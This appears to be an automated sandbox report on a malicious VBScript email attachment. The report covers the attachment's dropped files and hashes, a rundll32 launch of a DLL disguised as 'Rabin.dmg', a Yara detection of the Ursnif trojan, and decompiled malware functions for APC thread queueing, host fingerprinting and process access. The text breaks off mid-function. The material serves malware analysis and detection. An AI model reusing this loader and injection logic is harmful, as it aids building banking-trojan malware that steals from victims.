              MD5:99D9EE4F5137B94435D9BF49726E3D7B
              SHA1:4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
              SHA-256:F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
              SHA-512:7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: [{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..
              C:\Users\user\AppData\Local\Temp\alleyway.xlsx
              Process:C:\Windows\System32\wscript.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):80
              Entropy (8bit):5.163574463632383
              Encrypted:false
              SSDEEP:3:3s9Lk3Z0yVQKd7OD9BBYh5u0y2WTH:3cLk3Z0slGcy2U
              MD5:77EC729601A3992F484FACC6097DEE11
              SHA1:417311EE6DC848D66E47B8E68B8F9C532AC5C79F
              SHA-256:E0E14AAFC65AF3F390D75AFF8C88FBDF7A0BF133E9F12D17E5711F4045A5C9D5
              SHA-512:F021B44ED6762993538BE2EBA289D5774CBF9CB169459CD09064898D86005C14C69A06AAD5D21CEDC81DAA779154EB912E8EB82B9245763E5F5E2C05C8653650
              Malicious:false
              Reputation:low
              Preview: FAAkBTAIhXOUAMoireRLaHxWbPUlZalWstcYxWZvVPERfYbaTQdffXmYZltOOiDpvxWUqvHGWgEostPb
              C:\Users\user\AppData\Local\Temp\assai.zip
              Process:C:\Windows\System32\wscript.exe
              File Type:Zip archive data, at least v2.0 to extract
              Category:dropped
              Size (bytes):320012
              Entropy (8bit):7.998324397637329
              Encrypted:true
              SSDEEP:6144:DjW4WXZnaeeoYkxXTNShIvZwxpMbL0dUgkiZRQ1gmW5bhCvKZSag:waebhNGew0AdcuRQpubgSZq
              MD5:2E2BF9A0EB9139B28F959A6F17BD939B
              SHA1:BBF80A40979FF77ADB4B73DECEF9330B739BB90F
              SHA-256:8D621174B93D66DF438F8D377D2147CF578F16949E12F1E10BA34A77385D5A7E
              SHA-512:AE1F1A6084196CE0D7DA9776E8A10131BE63B7607E06EFCBD463E0D943622933BD57A74588155AB35202B1D2814C6D737D4D19EC0A8CF287BCE16A5CAEF943F9
              Malicious:true
              Reputation:low
              Preview: PK..........oR...0............Rabin.dmg..TSM..|........RD.........".@ .B .!....]....RTzS....w}.P.Qib..{..)..>..............3...3.....M... ..O(D.r........*Z.*.y......-3..)LmFB\tBx.vD8....&....tm.]..g.vl\$i........3.xJ. ....b.......*S.j..y".>.......-..U...D.YQ..'rK.%...1..Z.....>z:e.....%........!.H...D...d.....k..?...I.....g..X..*..!H....h#.a~Bd8+.A..%0...z.?......!.......l@....\...fB.._...m.._...O ....v..d*....r..3......+.S....P....u...nt..X...7..-#....@R`e+.d^..7.........j..y..XYP...3.}.cF....I.{..Jd_Uu.....E..,..._!.,E......A.9H7I`..@.......2....P.A...j...##1Z,.S)OIGp_(../w.J.*...>...E6(2M..$..._\....<9..$.....w....A.|O.2_"....9 dM....n..g+...q$.p.>O..[....2...-...>.S.W.....M..B......F.....?X...v......!:r...Nm<..P}.*.3..wW.....WY.x.-Ab.P.......jBu6ZN.EV.";......`.7P....k...D3/k..cA......*..~.?..E.......w...}.e...M..n.G...:..&.M8...<?.F.#.u..2..B.C9...xb..T.....BD.......,....gN..._..b.{.._...'....>....E......>Kg..*.2.)..g\.H.7.../...3.*...[._
              C:\Users\user\AppData\Local\Temp\hoydenish.org
              Process:C:\Windows\System32\wscript.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):52
              Entropy (8bit):4.8637132757501895
              Encrypted:false
              SSDEEP:3:vtWa/9HxtBzIZiK5joL1Mn:4a/9HaZimoZM
              MD5:178F2DF82EACC4BFB097B53800DD1375
              SHA1:5111F35F8111DF87B683550680FA04B212BEA51C
              SHA-256:2107126604B4344372E6F55EC1C5236390D69CD244AD4E1D4EDB8897EB3CC80F
              SHA-512:463289625A13052368207D93EC8F022BE92306C90F81CAE3B7410EF8248379AB3174728C6B74B2B8ADC546FACD869179AF380F55A75C340AC4E93AB3E542EC03
              Malicious:false
              Reputation:low
              Preview: CSESLsOohjfXcRaNVoRPbbBTVdxxLlXEhmACpoKBizFzenfLTOLT
              C:\Users\user\AppData\Local\Temp\lowboy.less
              Process:C:\Windows\System32\wscript.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):85
              Entropy (8bit):5.209234836510117
              Encrypted:false
              SSDEEP:3:3ccqAlDsLLHwwgvemfXKrhhHEXVn:3zlDsLLH/nHgVn
              MD5:1D15F444BCF2648DC0721083FFF8D015
              SHA1:58FEB5CFC3AF7DC5BAA8E59737E7FF06953AE6F2
              SHA-256:D5E8F55D13488EC247B6AA3DF73F58FDEB8B7B088ED880C1C4731DB360F76C29
              SHA-512:F1BA33F7F86692DAA5CAC7D012ACBB93FF8DFE581C42966D5BCACC94CADE98B82822476FC83AEE1AFF4FDCB93040CDBE55DC5987A4A2812EE6EEB521B7BB27E1
              Malicious:false
              Preview: xxRVgMoqKLNVcBafHUHjptDNknCInDxSEsRqLjuRcKmKaopdGWZzmuqNAboAxpobTjFJlipLqDnVvOPbcGxbp
              C:\Users\user\AppData\Local\Temp\technic.deb
              Process:C:\Windows\System32\wscript.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):32
              Entropy (8bit):4.288909765557392
              Encrypted:false
              SSDEEP:3:Y2HsiH2LrKo:YpVT
              MD5:F06DAE621E9DB556BF77FE26AEE12EE6
              SHA1:6F4F0CF969553AD4F74560B622AD500E62964B75
              SHA-256:191D824852449377B2AF1880BB10BB9E3A2AC22113A1A4BA7CEF068432E3EF76
              SHA-512:4974C197CD4D628D7C87A93C1B9CB88E4D0746C37293E8BE0054198EBE08ED6188EBB040EC549CE22D82E1BC74C03EEB57EC222746B7BBB4A43ECCE7B6CC785E
              Malicious:false
              Preview: XfkDGDNSNCzbIzkpbUQtSiozaaTEjbKb

              Static File Info

              General

              File type:ASCII text, with very long lines, with CRLF line terminators
              Entropy (8bit):4.127338439609775
              TrID:
                File name:Attachment_32954.vbs
                File size:1444626
                MD5:39eb3427fd329de93a19190d84273710
                SHA1:5d9009503b3500c0b6d35e272dd9160e9d873e46
                SHA256:adf9ca509037dc8ae4090fa9fa92c8eee621a9860a00da566b25643aa8689799
                SHA512:37f66cd5752fa5693c8132c9bfdc0c4df05c0a8a5fe5cf9ae686b848e1196b03fbbad52babfe2c10fb2a9ba7648748883a1727fa0f79ceb0906ec6283a1366ce
                SSDEEP:24576:yc/AM+84+NfRAwmcxvZ1RWB87cZ24PX/Hh/MEUUG1AXlvU2LDkhq5o8CqE:yc/v+84+NfRAwmcxvZ1RWB87cZ24PX/u
                File Content Preview:REM Etruria intemperate rage Berra gusty Angelo townsman Howell Muzak whether bespeak ..const prey = 11..const met = 33..fixate = Array(88,83,prey,capital,expatriate,8,8,8,harden,8,169,171,119,90,138,170,247,56,146,230,capital,8,8,retch,parkway,8,fiesta,8

                File Icon

                Icon Hash:e8d69ece869a9ec4

                Network Behavior

                No network behavior found

                System Behavior

                General

                Start time:11:43:59
                Start date:09/04/2021
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Attachment_32954.vbs'
                Imagebase:0x7ff7b3850000
                File size:163840 bytes
                MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:11:45:04
                Start date:09/04/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
                Imagebase:0x7ff6a5f60000
                File size:69632 bytes
                MD5 hash:73C519F050C20580F8A62C849D49215A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:11:45:04
                Start date:09/04/2021
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
                Imagebase:0xfc0000
                File size:61952 bytes
                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, Author: Joe Security
                Reputation:high

                Disassembly

                Code Analysis

                  Executed Functions

                  C-Code - Quality: 93%
                  			E00DC3512(signed char* __eax, intOrPtr* _a4) {
                  				signed int _v12;
                  				void* _v16;
                  				CHAR* _v20;
                  				struct _FILETIME _v28;
                  				void* _v32;
                  				void* _v36;
                  				char* _v40;
                  				signed int _v44;
                  				long _v344;
                  				struct _WIN32_FIND_DATAA _v368;
                  				signed int _t72;
                  				void* _t74;
                  				signed int _t76;
                  				void* _t78;
                  				intOrPtr _t81;
                  				CHAR* _t83;
                  				void* _t85;
                  				signed char _t89;
                  				signed char _t91;
                  				intOrPtr _t93;
                  				void* _t96;
                  				long _t99;
                  				int _t101;
                  				signed int _t109;
                  				char* _t111;
                  				void* _t113;
                  				int _t119;
                  				char _t128;
                  				void* _t134;
                  				signed int _t136;
                  				char* _t139;
                  				signed int _t140;
                  				char* _t141;
                  				char* _t146;
                  				signed char* _t148;
                  				int _t151;
                  				void* _t152;
                  				void* _t153;
                  				void* _t154;
                  				void* _t165;
                  
                  				_v12 = _v12 & 0x00000000;
                  				_t148 = __eax;
                  				_t72 =  *0xdcd22c; // 0x63699bc3
                  				_t74 = RtlAllocateHeap( *0xdcd1f0, 0, _t72 ^ 0x63699ac7);
                  				_v20 = _t74;
                  				if(_t74 == 0) {
                  					L36:
                  					return _v12;
                  				}
                  				_t76 =  *0xdcd22c; // 0x63699bc3
                  				_t78 = RtlAllocateHeap( *0xdcd1f0, 0, _t76 ^ 0x63699bce);
                  				_t146 = 0;
                  				_v36 = _t78;
                  				if(_t78 == 0) {
                  					L35:
                  					HeapFree( *0xdcd1f0, _t146, _v20);
                  					goto L36;
                  				}
                  				_t136 =  *0xdcd22c; // 0x63699bc3
                  				memset(_t78, 0, _t136 ^ 0x63699bce);
                  				_t81 =  *0xdcd230; // 0x434a5a8
                  				_t154 = _t153 + 0xc;
                  				_t5 = _t81 + 0xdce825; // 0x73797325
                  				_t83 = E00DCA590(_t5);
                  				_v20 = _t83;
                  				if(_t83 == 0) {
                  					L34:
                  					HeapFree( *0xdcd1f0, _t146, _v36);
                  					goto L35;
                  				}
                  				_t134 = 0xffffffffffffffff;
                  				_v28.dwLowDateTime = 0x63699bce;
                  				_v28.dwHighDateTime = 0x63699bce;
                  				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                  				_v32 = _t85;
                  				if(_t85 != 0x63699bce) {
                  					GetFileTime(_t85,  &_v28, 0, 0);
                  					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                  					asm("adc dword [ebp-0x14], 0xc9");
                  					CloseHandle(_v32);
                  				}
                  				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                  				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                  				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                  				 *_t148 = _t91;
                  				_v32 = _t91 & 0x000000ff;
                  				_t93 =  *0xdcd230; // 0x434a5a8
                  				_t16 = _t93 + 0xdce846; // 0x642e2a5c
                  				_v40 = _t146;
                  				_v44 = _t89 & 0x000000ff;
                  				__imp__(_v20, _t16);
                  				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                  				_v16 = _t96;
                  				if(_t96 == _t134) {
                  					_t146 = 0;
                  					goto L34;
                  				}
                  				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                  				while(_t99 > 0) {
                  					_t101 = FindNextFileA(_v16,  &_v368); // executed
                  					if(_t101 == 0) {
                  						FindClose(_v16);
                  						_v16 = FindFirstFileA(_v20,  &_v368);
                  						_v28.dwHighDateTime = _v344;
                  						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                  					}
                  					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                  				}
                  				_v12 = _v12 & 0x00000000;
                  				while(1) {
                  					_t109 = _v44;
                  					if(_v12 <= _t109) {
                  						goto L15;
                  					}
                  					_t140 = _v12;
                  					if(_t140 > _v32) {
                  						_t141 = _v36;
                  						 *_a4 = _t141;
                  						while(1) {
                  							_t128 =  *_t141;
                  							if(_t128 == 0) {
                  								break;
                  							}
                  							if(_t128 < 0x30) {
                  								 *_t141 = _t128 + 0x20;
                  							}
                  							_t141 = _t141 + 1;
                  						}
                  						_v12 = 1;
                  						FindClose(_v16);
                  						_t146 = 0;
                  						goto L35;
                  					}
                  					_t165 = _t140 - _t109;
                  					L15:
                  					if(_t165 == 0 || _v12 == _v32) {
                  						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                  						_t139 = _v40;
                  						_t151 = _t111 -  &(_v368.cFileName);
                  						_t113 = 0;
                  						if(_t139 != 0) {
                  							_t48 = _t151 - 4; // -4
                  							_t113 = _t48;
                  							if(_t113 > _t151) {
                  								_t113 = 0;
                  							}
                  						}
                  						if(_t151 > 4) {
                  							_t151 = 4;
                  						}
                  						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                  						_t154 = _t154 + 0xc;
                  						_v40 =  &(_v40[_t151]);
                  					}
                  					do {
                  						_t119 = FindNextFileA(_v16,  &_v368); // executed
                  						if(_t119 == 0) {
                  							FindClose(_v16);
                  							_v16 = FindFirstFileA(_v20,  &_v368);
                  						}
                  					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                  					_v12 = _v12 + 1;
                  				}
                  			}

                  APIs
                  • RtlAllocateHeap.NTDLL(00000000,63699BC3,00DCD2E0), ref: 00DC353D
                  • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00DC355F
                  • memset.NTDLL ref: 00DC3579
                    • Part of subcall function 00DCA590: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00DC3592,73797325), ref: 00DCA5A1
                    • Part of subcall function 00DCA590: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00DCA5BB
                  • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00DC35B7
                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00DC35CB
                  • CloseHandle.KERNEL32(?), ref: 00DC35E2
                  • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00DC35EE
                  • lstrcat.KERNEL32(?,642E2A5C), ref: 00DC362F
                  • FindFirstFileA.KERNELBASE(?,?), ref: 00DC3645
                  • CompareFileTime.KERNEL32(?,?), ref: 00DC3663
                  • FindNextFileA.KERNELBASE(00DC70B5,?), ref: 00DC3677
                  • FindClose.KERNEL32(00DC70B5), ref: 00DC3684
                  • FindFirstFileA.KERNEL32(?,?), ref: 00DC3690
                  • CompareFileTime.KERNEL32(?,?), ref: 00DC36B2
                  • StrChrA.SHLWAPI(?,0000002E), ref: 00DC36E5
                  • memcpy.NTDLL(00DC533C,?,00000000), ref: 00DC371E
                  • FindNextFileA.KERNELBASE(00DC70B5,?), ref: 00DC3733
                  • FindClose.KERNEL32(00DC70B5), ref: 00DC3740
                  • FindFirstFileA.KERNEL32(?,?), ref: 00DC374C
                  • CompareFileTime.KERNEL32(?,?), ref: 00DC375C
                  • FindClose.KERNEL32(00DC70B5), ref: 00DC3791
                  • HeapFree.KERNEL32(00000000,00DC533C,73797325), ref: 00DC37A3
                  • HeapFree.KERNEL32(00000000,?), ref: 00DC37B3
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File
                  Similarity
                  • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
                  • String ID:
                  • API String ID: 455834338-0
                  • Opcode ID: 563374da71e2c65e7fd606abb81677110d207f4704ff6f55ff6e11d956b5401c
                  • Instruction ID: 2db2e180d8ad06d633bd0e4e9da57dcfb83c81a53fa308a8c43da098e5f5fe24
                  • Opcode Fuzzy Hash: 563374da71e2c65e7fd606abb81677110d207f4704ff6f55ff6e11d956b5401c
                  • Instruction Fuzzy Hash: 4D8115B190020BEFDB119FA5DC84EEEBBB9FB48300F14416AE505E72A0D7319A459FB0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			E7025116D(intOrPtr _a4) {
                  				struct _SYSTEMTIME _v44;
                  				char _v48;
                  				long _v52;
                  				long _v56;
                  				long _v60;
                  				void* __edi;
                  				long _t21;
                  				int _t23;
                  				long _t26;
                  				long _t27;
                  				void* _t28;
                  				long _t31;
                  				long _t32;
                  				void* _t41;
                  				intOrPtr _t43;
                  				long _t48;
                  				intOrPtr _t49;
                  				signed int _t50;
                  				void* _t57;
                  				signed int _t61;
                  				void* _t63;
                  				intOrPtr* _t64;
                  
                  				_t21 = E70251756();
                  				_v52 = _t21;
                  				if(_t21 != 0) {
                  					L21:
                  					return _t21;
                  				} else {
                  					goto L1;
                  				}
                  				do {
                  					L1:
                  					GetSystemTime( &_v44);
                  					_t23 = SwitchToThread();
                  					asm("cdq");
                  					_t50 = 9;
                  					_t61 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t50;
                  					_t26 = E70251000(0, _t61); // executed
                  					_v56 = _t26;
                  					Sleep(_t61 << 5); // executed
                  					_t21 = _v56;
                  				} while (_t21 == 0xc);
                  				if(_t21 != 0) {
                  					goto L21;
                  				}
                  				_t27 = E70252020(_t50); // executed
                  				_v52 = _t27;
                  				if(_t27 != 0) {
                  					L19:
                  					_t21 = _v52;
                  					if(_t21 == 0xffffffff) {
                  						_t21 = GetLastError();
                  					}
                  					goto L21;
                  				}
                  				if(_a4 != 0) {
                  					L11:
                  					_t28 = CreateThread(0, 0, __imp__SleepEx,  *0x7025414c, 0, 0); // executed
                  					_t63 = _t28;
                  					if(_t63 == 0) {
                  						L18:
                  						_v56 = GetLastError();
                  						goto L19;
                  					}
                  					_t31 = QueueUserAPC(E70251E8A, _t63,  &(_v44.wSecond)); // executed
                  					if(_t31 == 0) {
                  						_t48 = GetLastError();
                  						TerminateThread(_t63, _t48);
                  						CloseHandle(_t63);
                  						_t63 = 0;
                  						SetLastError(_t48);
                  					}
                  					if(_t63 == 0) {
                  						goto L18;
                  					} else {
                  						_t32 = WaitForSingleObject(_t63, 0xffffffff);
                  						_v60 = _t32;
                  						if(_t32 == 0) {
                  							GetExitCodeThread(_t63,  &_v60);
                  						}
                  						CloseHandle(_t63);
                  						goto L19;
                  					}
                  				}
                  				if(E70251CCA(_t50,  &_v48) != 0) {
                  					 *0x70254138 = 0;
                  					goto L11;
                  				}
                  				_t49 = _v48;
                  				_t64 = __imp__GetLongPathNameW;
                  				_t41 =  *_t64(_t49, 0, 0); // executed
                  				_t57 = _t41;
                  				if(_t57 == 0) {
                  					L9:
                  					 *0x70254138 = _t49;
                  					goto L11;
                  				}
                  				_t15 = _t57 + 2; // 0x2
                  				_t43 = E702519C2(_t57 + _t15);
                  				 *0x70254138 = _t43;
                  				if(_t43 == 0) {
                  					goto L9;
                  				}
                  				 *_t64(_t49, _t43, _t57); // executed
                  				E702515C4(_t49);
                  				goto L11;
                  			}

                  APIs
                    • Part of subcall function 70251756: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,7025117E), ref: 70251765
                    • Part of subcall function 70251756: GetVersion.KERNEL32(?,7025117E), ref: 70251774
                    • Part of subcall function 70251756: GetCurrentProcessId.KERNEL32(?,7025117E), ref: 70251783
                    • Part of subcall function 70251756: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,7025117E), ref: 7025179C
                  • GetSystemTime.KERNEL32(?), ref: 70251191
                  • SwitchToThread.KERNEL32 ref: 70251197
                    • Part of subcall function 70251000: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00000000,?,00000000,?,?,?,?,?,?,702511B2,00000000), ref: 70251056
                    • Part of subcall function 70251000: memcpy.NTDLL(?,702511B2,?,?,00000000,?,00000000,?,?,?,?,?,?,702511B2,00000000), ref: 702510E8
                    • Part of subcall function 70251000: VirtualFree.KERNELBASE(702511B2,00000000,00008000,?,00000000,?,00000000,?,?,?,?,?,?,702511B2,00000000), ref: 70251103
                  • Sleep.KERNELBASE(00000000,00000000), ref: 702511BA
                  • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 70251202
                  • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 70251220
                  • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?), ref: 7025124A
                  • QueueUserAPC.KERNELBASE(70251E8A,00000000,?), ref: 70251261
                  • GetLastError.KERNEL32 ref: 70251271
                  • TerminateThread.KERNEL32(00000000,00000000), ref: 7025127B
                  • CloseHandle.KERNEL32(00000000), ref: 70251282
                  • SetLastError.KERNEL32(00000000), ref: 70251287
                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 70251294
                  • GetExitCodeThread.KERNEL32(00000000,?), ref: 702512A8
                  • CloseHandle.KERNEL32(00000000), ref: 702512AF
                  • GetLastError.KERNEL32 ref: 702512B3
                  • GetLastError.KERNEL32 ref: 702512C6
                  Memory Dump Source
                  • Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true
                  • Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp
                  • Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp
                  Similarity
                  • API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchSystemTerminateTimeUserVersionWaitmemcpy
                  • String ID:
                  • API String ID: 2478182988-0
                  • Opcode ID: 3df6a7da13757c93ec8c8bf1845bf28ef7cc8083a969f902fa05196ed0352311
                  • Instruction ID: e633280d1a75db0624ad243a1865639f5b346e9e97ff6d9276ffe0ccee63f47e
                  • Opcode Fuzzy Hash: 3df6a7da13757c93ec8c8bf1845bf28ef7cc8083a969f902fa05196ed0352311
                  • Instruction Fuzzy Hash: 6B41B873608721AF8311DF768C4CA5FBBFCEA85264B200699FD15C2290E734D9199B69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 96%
                  			E00DCA12A(char __eax, signed int* __esi) {
                  				long _v8;
                  				char _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				signed int _v28;
                  				long _t34;
                  				signed int _t39;
                  				long _t50;
                  				char _t59;
                  				intOrPtr _t61;
                  				void* _t62;
                  				void* _t63;
                  				signed int* _t64;
                  				char _t65;
                  				intOrPtr* _t67;
                  				void* _t68;
                  				signed int* _t69;
                  
                  				_t69 = __esi;
                  				_t65 = __eax;
                  				_v8 = 0;
                  				_v12 = __eax;
                  				if(__eax == 0) {
                  					_t59 =  *0xdcd228; // 0xbd092303
                  					_v12 = _t59;
                  				}
                  				_t64 = _t69;
                  				E00DC5B70( &_v12, _t64);
                  				if(_t65 != 0) {
                  					 *_t69 =  *_t69 ^  *0xdcd22c ^ 0x4c0ca0ae;
                  				} else {
                  					GetUserNameW(0,  &_v8); // executed
                  					_t50 = _v8;
                  					if(_t50 != 0) {
                  						_t62 = RtlAllocateHeap( *0xdcd1f0, 0, _t50 + _t50);
                  						if(_t62 != 0) {
                  							if(GetUserNameW(_t62,  &_v8) != 0) {
                  								_t63 = _t62;
                  								 *_t69 =  *_t69 ^ E00DC5AC5(_v8 + _v8, _t63);
                  							}
                  							HeapFree( *0xdcd1f0, 0, _t62);
                  						}
                  					}
                  				}
                  				_t61 = __imp__;
                  				_v8 = _v8 & 0x00000000;
                  				GetComputerNameW(0,  &_v8);
                  				_t34 = _v8;
                  				if(_t34 != 0) {
                  					_t68 = RtlAllocateHeap( *0xdcd1f0, 0, _t34 + _t34);
                  					if(_t68 != 0) {
                  						if(GetComputerNameW(_t68,  &_v8) != 0) {
                  							_t63 = _t68;
                  							_t69[3] = _t69[3] ^ E00DC5AC5(_v8 + _v8, _t63);
                  						}
                  						HeapFree( *0xdcd1f0, 0, _t68);
                  					}
                  				}
                  				asm("cpuid");
                  				_t67 =  &_v28;
                  				 *_t67 = 1;
                  				 *((intOrPtr*)(_t67 + 4)) = _t61;
                  				 *(_t67 + 8) = _t63;
                  				 *(_t67 + 0xc) = _t64;
                  				_t39 = _v16 ^ _v20 ^ _v28;
                  				_t69[1] = _t69[1] ^ _t39;
                  				return _t39;
                  			}

                  APIs
                  • GetUserNameW.ADVAPI32(00000000,00DC79C7), ref: 00DCA161
                  • RtlAllocateHeap.NTDLL(00000000,00DC79C7), ref: 00DCA178
                  • GetUserNameW.ADVAPI32(00000000,00DC79C7), ref: 00DCA185
                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00DC79C7,?,?,?,?,?,00DC87DD,?,00000001), ref: 00DCA1A6
                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DCA1CD
                  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00DCA1E1
                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00DCA1EE
                  • HeapFree.KERNEL32(00000000,00000000), ref: 00DCA20C
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: HeapName$AllocateComputerFreeUser
                  • String ID:
                  • API String ID: 3239747167-0
                  • Opcode ID: d00445f683a080c1cdd927931f24037b5e49c75c0b20f969bd83ba86e33dc48b
                  • Instruction ID: ac09a0015b45da4c954fa01a51648bae5a1c9ffeccc0fc94c299844da14bcad4
                  • Opcode Fuzzy Hash: d00445f683a080c1cdd927931f24037b5e49c75c0b20f969bd83ba86e33dc48b
                  • Instruction Fuzzy Hash: 1631E272A1030BEFDB11DFA9DC81F6AB7FAEB48214F684469E505D3210D730EE01AB65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateSemaphoreA.KERNEL32(00000000,00000008,00000008,00000000), ref: 70291078
                  • GetSystemDirectoryA.KERNEL32(702C1460,0000079D), ref: 702916AF
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: CreateDirectorySemaphoreSystem
                  • String ID: $",p$4$4,p
                  • API String ID: 3735132268-3300495120
                  • Opcode ID: 27f8fe6a4ff15f05e0855df5a2143e018a3654a3c94a7614ed08f7b45006b8eb
                  • Instruction ID: 542995ae4b592a3238c591952862fd0b2b28f72fc35127c9a48e7c68580d6d0c
                  • Opcode Fuzzy Hash: 27f8fe6a4ff15f05e0855df5a2143e018a3654a3c94a7614ed08f7b45006b8eb
                  • Instruction Fuzzy Hash: 65625D72A11219CFEB24CF29CC94BDDB7B5BB48304F1482AAD449E7390DB70AA94DF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 38%
                  			E00DC11A9(char _a4, void* _a8) {
                  				void* _v8;
                  				void* _v12;
                  				char _v16;
                  				void* _v20;
                  				char _v24;
                  				char _v28;
                  				char _v32;
                  				char _v36;
                  				char _v40;
                  				void* _v44;
                  				void** _t33;
                  				void* _t40;
                  				void* _t43;
                  				void** _t44;
                  				intOrPtr* _t47;
                  				char _t48;
                  
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				_v20 = _a4;
                  				_t48 = 0;
                  				_v16 = 0;
                  				_a4 = 0;
                  				_v44 = 0x18;
                  				_v40 = 0;
                  				_v32 = 0;
                  				_v36 = 0;
                  				_v28 = 0;
                  				_v24 = 0;
                  				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                  					_t33 =  &_v8;
                  					__imp__(_v12, 8, _t33);
                  					if(_t33 >= 0) {
                  						_t47 = __imp__;
                  						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                  						_t44 = E00DC75C4(_a4);
                  						if(_t44 != 0) {
                  							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                  							if(_t40 >= 0) {
                  								memcpy(_a8,  *_t44, 0x1c);
                  								_t48 = 1;
                  							}
                  							E00DC4C31(_t44);
                  						}
